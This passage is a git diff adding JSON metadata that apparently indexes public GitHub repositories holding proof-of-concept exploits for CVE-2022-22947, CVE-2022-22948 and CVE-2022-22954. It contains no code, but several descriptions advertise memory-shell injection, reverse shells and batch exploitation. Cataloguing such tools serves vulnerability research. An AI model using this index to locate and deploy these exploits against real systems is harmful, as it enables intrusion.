"subscribers_count": 1 + }, + { + "id": 469331651, + "name": "spring-cloud-gateway-rce", + "full_name": "k3rwin\/spring-cloud-gateway-rce", + "owner": { + "login": "k3rwin", + "id": 59213152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59213152?v=4", + "html_url": "https:\/\/github.com\/k3rwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3rwin\/spring-cloud-gateway-rce", + "description": "spring-cloud-gateway-rce CVE-2022-22947", + "fork": false, + "created_at": "2022-03-13T10:00:21Z", + "updated_at": "2024-05-21T08:49:00Z", + "pushed_at": "2022-07-13T02:38:10Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470075351, + "name": "CVE-2022-22947", + "full_name": "bysinks\/CVE-2022-22947", + "owner": { + "login": "bysinks", + "id": 50199185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50199185?v=4", + "html_url": "https:\/\/github.com\/bysinks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bysinks\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-15T08:50:13Z", + "updated_at": "2022-04-04T14:44:21Z", + "pushed_at": "2022-03-15T08:52:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470921945, + "name": "CVE-2022-22947", + "full_name": "Wrin9\/CVE-2022-22947", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2022-22947", + "description": "CVE-2022-22947_POC_EXP", + "fork": false, + "created_at": "2022-03-17T09:12:51Z", + "updated_at": "2024-08-12T20:21:38Z", + "pushed_at": "2022-03-17T09:58:23Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471270998, + "name": "spring_cloud_gateway_memshell", + "full_name": "viemsr\/spring_cloud_gateway_memshell", + "owner": { + "login": "viemsr", + "id": 49220017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49220017?v=4", + "html_url": "https:\/\/github.com\/viemsr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viemsr\/spring_cloud_gateway_memshell", + "description": "CVE-2022-22947 memshell", + "fork": false, + "created_at": "2022-03-18T07:17:17Z", + "updated_at": "2024-05-31T14:33:06Z", + "pushed_at": "2022-03-18T07:17:45Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cloud-gateway-poc", + "cve-2022-22947", + "memshell" + ], + "visibility": "public", + "forks": 1, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 472548304, + "name": "cve-2022-22947-spring-cloud-gateway", + "full_name": "Enokiy\/cve-2022-22947-spring-cloud-gateway", + "owner": { + "login": "Enokiy", + "id": 33446650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33446650?v=4", + "html_url": "https:\/\/github.com\/Enokiy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Enokiy\/cve-2022-22947-spring-cloud-gateway", + "description": null, + "fork": false, + "created_at": "2022-03-21T23:37:20Z", + "updated_at": "2024-06-03T08:21:00Z", + "pushed_at": "2022-04-07T01:21:34Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 474005175, + "name": "CVE-2022-22947", + "full_name": "Nathaniel1025\/CVE-2022-22947", + "owner": { + "login": "Nathaniel1025", + "id": 96125538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96125538?v=4", + "html_url": "https:\/\/github.com\/Nathaniel1025", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nathaniel1025\/CVE-2022-22947", + "description": "poc for CVE-2022-22947", + "fork": false, + "created_at": "2022-03-25T12:43:53Z", + "updated_at": "2023-04-04T13:54:17Z", + "pushed_at": "2022-03-25T12:57:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475545855, + "name": "CVE-2022-22947", + "full_name": "Vancomycin-g\/CVE-2022-22947", + "owner": { + "login": "Vancomycin-g", + "id": 75327057, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75327057?v=4", + "html_url": "https:\/\/github.com\/Vancomycin-g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vancomycin-g\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-29T17:17:34Z", + "updated_at": "2022-04-11T12:37:37Z", + "pushed_at": "2022-03-30T15:43:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475703854, + "name": "CVE-2022-22947-exp", + "full_name": "scopion\/CVE-2022-22947-exp", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2022-22947-exp", + "description": null, + "fork": false, + "created_at": "2022-03-30T03:22:50Z", + "updated_at": "2022-04-14T01:12:30Z", + "pushed_at": "2022-03-30T03:15:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476084548, + "name": "springcloudRCE", + "full_name": "sagaryadav8742\/springcloudRCE", + "owner": { + "login": "sagaryadav8742", + "id": 42890650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42890650?v=4", + "html_url": "https:\/\/github.com\/sagaryadav8742", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sagaryadav8742\/springcloudRCE", + "description": "Spring Cloud Gateway RCE - CVE-2022-22947 ", + "fork": false, + "created_at": "2022-03-30T23:33:43Z", + "updated_at": "2022-03-31T06:53:10Z", + "pushed_at": "2022-03-30T23:35:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476087252, + "name": "CVE-2022-22947", + "full_name": "fbion\/CVE-2022-22947", + "owner": { + "login": "fbion", + "id": 6179189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6179189?v=4", + "html_url": "https:\/\/github.com\/fbion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbion\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL Code Injection.", + "fork": false, + "created_at": "2022-03-30T23:47:39Z", + "updated_at": "2023-07-28T03:28:19Z", + "pushed_at": "2022-03-04T18:45:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476673811, + "name": "Spring-Cloud-Gateway-CVE-2022-22947", + "full_name": "talentsec\/Spring-Cloud-Gateway-CVE-2022-22947", + "owner": { + "login": "talentsec", + "id": 20452803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20452803?v=4", + "html_url": "https:\/\/github.com\/talentsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/talentsec\/Spring-Cloud-Gateway-CVE-2022-22947", + "description": "Spring-Cloud-Gateway-CVE-2022-22947", + "fork": false, + "created_at": "2022-04-01T10:24:02Z", + "updated_at": "2022-04-02T02:07:44Z", + "pushed_at": "2022-04-01T10:24:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478073054, + "name": "CVE-2022-22947-POC-Reproduce", + "full_name": "aesm1p\/CVE-2022-22947-POC-Reproduce", + "owner": { + "login": "aesm1p", + "id": 34368874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34368874?v=4", + "html_url": "https:\/\/github.com\/aesm1p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aesm1p\/CVE-2022-22947-POC-Reproduce", + "description": "CVE-2022-22947 reproduce", + "fork": false, + "created_at": "2022-04-05T10:11:03Z", + "updated_at": "2022-04-05T11:20:31Z", + "pushed_at": "2022-04-05T10:14:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 478494950, + "name": "CVE-2022-22947", + "full_name": "4nNns\/CVE-2022-22947", + "owner": { + "login": "4nNns", + "id": 89631611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89631611?v=4", + "html_url": "https:\/\/github.com\/4nNns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4nNns\/CVE-2022-22947", + "description": "Spring-Cloud-Spel-RCE", + "fork": false, + "created_at": "2022-04-06T09:40:05Z", + "updated_at": "2024-02-18T06:40:45Z", + "pushed_at": "2022-09-16T08:00:46Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480389849, + "name": "Burp_VulPscan", + "full_name": "expzhizhuo\/Burp_VulPscan", + "owner": { + "login": "expzhizhuo", + "id": 64049774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64049774?v=4", + "html_url": "https:\/\/github.com\/expzhizhuo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expzhizhuo\/Burp_VulPscan", + "description": "burp被动扫描插件,目前只有CVE-2022-22947", + "fork": false, + "created_at": "2022-04-11T13:22:11Z", + "updated_at": "2024-08-12T20:22:20Z", + "pushed_at": "2022-04-11T11:32:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 482005646, + "name": "cve-2022-22947", + "full_name": "twseptian\/cve-2022-22947", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)", + "fork": false, + "created_at": "2022-04-15T15:41:36Z", + "updated_at": "2024-05-30T04:39:06Z", + "pushed_at": "2022-04-15T15:48:07Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-22947", + "rce", + "remote-code-execution", + "spring-cloud-gateway", + "spring-framework" + ], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 485650447, + "name": "cve-2022-22947-godzilla-memshell", + "full_name": "whwlsfb\/cve-2022-22947-godzilla-memshell", + "owner": { + "login": "whwlsfb", + "id": 8212964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8212964?v=4", + "html_url": "https:\/\/github.com\/whwlsfb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whwlsfb\/cve-2022-22947-godzilla-memshell", + "description": "CVE-2022-22947 注入Godzilla内存马", + "fork": false, + "created_at": "2022-04-26T05:48:27Z", + "updated_at": "2024-11-07T04:36:33Z", + "pushed_at": "2022-04-26T05:55:58Z", + "stargazers_count": 203, + "watchers_count": 203, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 203, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 492894023, + "name": "CVE-2022-22947-", + "full_name": "0730Nophone\/CVE-2022-22947-", + "owner": { + "login": "0730Nophone", + "id": 50388373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50388373?v=4", + "html_url": "https:\/\/github.com\/0730Nophone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0730Nophone\/CVE-2022-22947-", + "description": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947) 注入哥斯拉内存马", + "fork": false, + "created_at": "2022-05-16T15:27:41Z", + "updated_at": "2024-10-29T11:12:35Z", + "pushed_at": "2022-05-16T15:33:37Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 53, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 494117439, + "name": "CVE-2022-22947_EXP", + "full_name": "anansec\/CVE-2022-22947_EXP", + "owner": { + "login": "anansec", + "id": 54608694, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54608694?v=4", + "html_url": "https:\/\/github.com\/anansec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anansec\/CVE-2022-22947_EXP", + "description": "一个可单独、批量验证的脚本,也可以反弹shell", + "fork": false, + "created_at": "2022-05-19T14:58:45Z", + "updated_at": "2022-12-14T12:49:59Z", + "pushed_at": "2022-05-19T16:26:41Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497460990, + "name": "CVE-2022-22947-exp", + "full_name": "Wrong-pixel\/CVE-2022-22947-exp", + "owner": { + "login": "Wrong-pixel", + "id": 43137902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43137902?v=4", + "html_url": "https:\/\/github.com\/Wrong-pixel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrong-pixel\/CVE-2022-22947-exp", + "description": null, + "fork": false, + "created_at": "2022-05-29T01:07:26Z", + "updated_at": "2023-02-08T06:37:58Z", + "pushed_at": "2022-05-29T01:08:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501191165, + "name": "CVE-2022-22947-POC", + "full_name": "stayfoolish777\/CVE-2022-22947-POC", + "owner": { + "login": "stayfoolish777", + "id": 104476528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104476528?v=4", + "html_url": "https:\/\/github.com\/stayfoolish777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stayfoolish777\/CVE-2022-22947-POC", + "description": "批量检测Spring Cloud Gateway 远程代码执行漏洞 Spring_Cloud_Gateway_RCE_POC-CVE-2022-22947", + "fork": false, + "created_at": "2022-06-08T09:52:23Z", + "updated_at": "2024-08-12T20:23:56Z", + "pushed_at": "2022-06-09T09:03:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 507218064, + "name": "Spring-Cloud-Gateway-Nacos", + "full_name": "B0rn2d\/Spring-Cloud-Gateway-Nacos", + "owner": { + "login": "B0rn2d", + "id": 58602566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58602566?v=4", + "html_url": "https:\/\/github.com\/B0rn2d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B0rn2d\/Spring-Cloud-Gateway-Nacos", + "description": "Nacos下Spring-Cloud-Gateway CVE-2022-22947利用环境", + "fork": false, + "created_at": "2022-06-25T05:02:06Z", + "updated_at": "2024-09-02T04:27:40Z", + "pushed_at": "2022-06-25T13:43:53Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513057641, + "name": "CVE-2022-22947", + "full_name": "kmahyyg\/CVE-2022-22947", + "owner": { + "login": "kmahyyg", + "id": 16604643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16604643?v=4", + "html_url": "https:\/\/github.com\/kmahyyg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kmahyyg\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-07-12T08:20:02Z", + "updated_at": "2022-07-12T08:40:46Z", + "pushed_at": "2022-07-12T08:24:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 520716888, + "name": "CVE-2022-22947", + "full_name": "LY613313\/CVE-2022-22947", + "owner": { + "login": "LY613313", + "id": 79431359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79431359?v=4", + "html_url": "https:\/\/github.com\/LY613313", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LY613313\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-08-03T02:51:26Z", + "updated_at": "2022-09-26T04:06:18Z", + "pushed_at": "2022-08-03T03:09:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 527864103, + "name": "CVE-2022-22947", + "full_name": "SiJiDo\/CVE-2022-22947", + "owner": { + "login": "SiJiDo", + "id": 28096209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28096209?v=4", + "html_url": "https:\/\/github.com\/SiJiDo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SiJiDo\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-08-23T06:38:46Z", + "updated_at": "2024-02-28T14:26:36Z", + "pushed_at": "2022-08-23T06:40:24Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566244243, + "name": "CVE-2022-22947", + "full_name": "qq87234770\/CVE-2022-22947", + "owner": { + "login": "qq87234770", + "id": 32386331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32386331?v=4", + "html_url": "https:\/\/github.com\/qq87234770", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq87234770\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-11-15T09:11:14Z", + "updated_at": "2022-11-16T01:22:01Z", + "pushed_at": "2022-11-15T09:16:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 598386749, + "name": "CVE-2022-22947", + "full_name": "Zh0um1\/CVE-2022-22947", + "owner": { + "login": "Zh0um1", + "id": 94421064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94421064?v=4", + "html_url": "https:\/\/github.com\/Zh0um1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zh0um1\/CVE-2022-22947", + "description": "CVE-2022-22947注入哥斯拉内存马", + "fork": false, + "created_at": "2023-02-07T01:59:01Z", + "updated_at": "2024-10-29T11:26:33Z", + "pushed_at": "2023-06-21T15:43:11Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645770114, + "name": "CVE-2022-22947", + "full_name": "Le1a\/CVE-2022-22947", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行Exp", + "fork": false, + "created_at": "2023-05-26T11:52:22Z", + "updated_at": "2023-06-02T03:47:18Z", + "pushed_at": "2023-05-27T04:38:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738464216, + "name": "CVE-2022-22947", + "full_name": "Sumitpathania03\/CVE-2022-22947", + "owner": { + "login": "Sumitpathania03", + "id": 126046383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126046383?v=4", + "html_url": "https:\/\/github.com\/Sumitpathania03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sumitpathania03\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2024-01-03T09:37:54Z", + "updated_at": "2024-11-26T09:43:53Z", + "pushed_at": "2024-04-02T06:35:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817383255, + "name": "CVE-2022-22947", + "full_name": "cc3305\/CVE-2022-22947", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2022-22947", + "description": "CVE-2022-22947 exploit script", + "fork": false, + "created_at": "2024-06-19T15:31:19Z", + "updated_at": "2024-07-27T20:16:38Z", + "pushed_at": "2024-07-27T20:16:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22948.json b/2022/CVE-2022-22948.json new file mode 100644 index 0000000000..7612874826 --- /dev/null +++ b/2022/CVE-2022-22948.json @@ -0,0 +1,33 @@ +[ + { + "id": 418085843, + "name": "CVE-2022-22948", + "full_name": "PenteraIO\/CVE-2022-22948", + "owner": { + "login": "PenteraIO", + "id": 60603602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60603602?v=4", + "html_url": "https:\/\/github.com\/PenteraIO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenteraIO\/CVE-2022-22948", + "description": "Scanner for CVE-2022-22948 an Information Disclosure in VMWare vCenter", + "fork": false, + "created_at": "2021-10-17T09:59:20Z", + "updated_at": "2024-08-12T20:17:18Z", + "pushed_at": "2023-05-09T12:42:40Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22954.json b/2022/CVE-2022-22954.json new file mode 100644 index 0000000000..fcc6175b9f --- /dev/null +++ b/2022/CVE-2022-22954.json @@ -0,0 +1,818 @@ +[ + { + "id": 302605271, + "name": "CVE-2022-22954-POC", + "full_name": "axingde\/CVE-2022-22954-POC", + "owner": { + "login": "axingde", + "id": 65204372, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65204372?v=4", + "html_url": "https:\/\/github.com\/axingde", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axingde\/CVE-2022-22954-POC", + "description": "提供单个或批量URL扫描是否存在CVE-2022-22954功能", + "fork": false, + "created_at": "2020-10-09T10:14:50Z", + "updated_at": "2022-09-07T05:13:35Z", + "pushed_at": "2022-04-15T09:33:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22954", + "python" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480404614, + "name": "VMware-CVE-2022-22954", + "full_name": "sherlocksecurity\/VMware-CVE-2022-22954", + "owner": { + "login": "sherlocksecurity", + "id": 52328067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52328067?v=4", + "html_url": "https:\/\/github.com\/sherlocksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sherlocksecurity\/VMware-CVE-2022-22954", + "description": "POC for VMWARE CVE-2022-22954", + "fork": false, + "created_at": "2022-04-11T13:59:23Z", + "updated_at": "2024-10-21T10:38:17Z", + "pushed_at": "2022-04-13T06:15:11Z", + "stargazers_count": 280, + "watchers_count": 280, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 280, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 480528421, + "name": "VMWare_CVE-2022-22954", + "full_name": "Vulnmachines\/VMWare_CVE-2022-22954", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/VMWare_CVE-2022-22954", + "description": "CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager", + "fork": false, + "created_at": "2022-04-11T19:46:56Z", + "updated_at": "2022-08-11T23:58:14Z", + "pushed_at": "2022-04-11T19:59:53Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480583438, + "name": "CVE-2022-22954", + "full_name": "aniqfakhrul\/CVE-2022-22954", + "owner": { + "login": "aniqfakhrul", + "id": 39443758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39443758?v=4", + "html_url": "https:\/\/github.com\/aniqfakhrul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aniqfakhrul\/CVE-2022-22954", + "description": null, + "fork": false, + "created_at": "2022-04-11T23:21:50Z", + "updated_at": "2024-08-12T20:22:21Z", + "pushed_at": "2022-05-27T09:07:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480649709, + "name": "CVE-2022-22954", + "full_name": "jax7sec\/CVE-2022-22954", + "owner": { + "login": "jax7sec", + 